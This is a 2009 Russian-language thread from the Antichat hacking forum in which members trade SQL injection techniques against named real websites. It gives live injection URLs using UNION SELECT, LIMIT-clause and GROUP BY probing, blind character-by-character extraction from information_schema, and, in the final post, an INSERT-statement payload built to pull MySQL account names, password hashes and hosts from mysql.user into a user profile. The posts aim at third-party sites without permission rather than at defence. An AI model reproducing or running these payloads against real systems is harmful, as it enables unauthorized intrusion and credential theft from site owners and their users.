Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

18.03.2009, 19:04
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме: 3152874
Репутация:
1020
|
|
Сообщение от sj666
Мм, я недавно начал заниматься sql inj поэтому туплю маленько.
Вот например пытаюсь подобрать кол-во столбцов в db_galery
http://www.danieldefo.ru/gallery.html?top=1;-- UNION SELECT 1 --
Ошибки нет, возвращается так же страница =\
Ты закрываешь коментом свой запрос вот он и проходит, вобше уязвимый параметр у нас в limit:
The LIMIT clause can be used to constrain the number of rows returned by the SELECT statement. LIMIT takes one or two numeric arguments, which must both be non-negative integer constants (except when using prepared statements).
2Byrger это не слепая, переводить можно и так(php)
echo "0x".bin2hex("здесь пишем чего хотим перевисти");
Последний раз редактировалось AkyHa_MaTaTa; 18.03.2009 в 19:06..
|
|
|

18.03.2009, 19:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от Byrger
А где переводить в такую бяку?
https://forum.antichat.ru/showpost.php?p=1151651&postcount=657
|
|
|

18.03.2009, 19:22
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
Сообщение от sj666
http://www.danieldefo.ru/gallery.html?top=1
После непродолжительных работ, сайт откроектся =)
Оставайтесь с нами!
Для тех, кто не знает кто такой даниельдефо - погуглите =)
А инъекция после лимита возможна. Более чем )
|
|
|

18.03.2009, 19:22
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
s_p_a_m
Там INSERT
http://www.zork.name/?view=2)+and+substring(version(),1,1)=(5
вот перебор, если нужен
http://www.zork.name/?view=2)+AND+ascii(lower(substring((select+table_n ame+from+information_schema.tables+limit+17,1),1,1 )))<(53
===============================
Сообщение от ElteRUS
А инъекция после лимита возможна. Более чем )
Давай посмотрим реализацию  Например тут:
http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140'
http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140,2--+
Ну или твой вариант с удовольствием посмотрю. С "ORDER BY", что-бы всё как положено 
Последний раз редактировалось jokester; 18.03.2009 в 19:51..
|
|
|

18.03.2009, 19:54
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме: 95879
Репутация:
5
|
|
А инъекция после лимита возможна. Более чем )
INSERT? или есть еще что интересного?
|
|
|

18.03.2009, 19:57
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме: 95879
Репутация:
5
|
|
Давай посмотрим реализацию Например тут:
http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140'
http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140,2--+
Ну или твой вариант с удовольствием посмотрю. С "ORDER BY", что-бы всё как положено
Да я то же хочу посмотреть!!!!!
|
|
|

18.03.2009, 20:09
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
Сообщение от jokester
С "ORDER BY", что-бы всё как положено 
Если в запросе есть ордей бай то нельзя. Ну мне нужно было конкретизировать, сори что ввел вас в заблуждение 
|
|
|

18.03.2009, 20:43
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
http://pastebin.com/m19eaa637
Переменная form_number не проходит фильтрацию...Но я так понял,что даже если она и уязвима,то вывода не будет ?
PHP код:
$result = mysql_query("INSERT INTO Users
(firstname,lastname,school_id,description,email,username,password)
VALUES
('$firstname','$lastname','$school_id','$form_number','$email','$username',
Password('$password'))");
В school_id только XSS...
В остальных переменных режутся хтмл и пхп strip_tags() функцией...не знаю,что и делать.Что касается проверки длины полей хтмл формы,то проверка идёт только на уровне приложения,а сервер отдыхает...Хотя бы поле password. Может,кто найдёт здесь sql inj или щё что-нибудь интересное ?
ПЫСЫ: Если что, то приму минусы в подарок,если написал не туда,куда полагается...
Последний раз редактировалось Велемир; 18.03.2009 в 20:52..
Причина: да вот)
|
|
|

18.03.2009, 21:12
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Код HTML:
http://www.gmpr.ru/news_item.php?id=699'
А дальше не воспринимает....
Код HTML:
http://www.gmpr.ru/news_item.php?id=699+group+by+400--
|
|
|

18.03.2009, 21:12
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме: 1754802
Репутация:
380
|
|
Сообщение от Велемир
http://pastebin.com/m19eaa637
Переменная form_number не проходит фильтрацию...Но я так понял,что даже если она и уязвима,то вывода не будет ?
PHP код:
$result = mysql_query("INSERT INTO Users
(firstname,lastname,school_id,description,email,username,password)
VALUES
('$firstname','$lastname','$school_id','$form_number','$email','$username',
Password('$password'))");
если $form_number уязвима и MySQL поддерживает подзапросы + кавычки не слешируються то можешь зделать своеобразный вывод в пользовательских профиле(естественно это имеет смысл еслу тебя есть доступ к данным пользователя), то есть что то типо такого:
$form_number = 1',(select concat_ws(0x3a,user,password,host) from mysql.user limit 1),'dodik','pass' /*
потом ишешь пользователя dodik и по идее у него в мыли будет лежать наш подзапрос.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|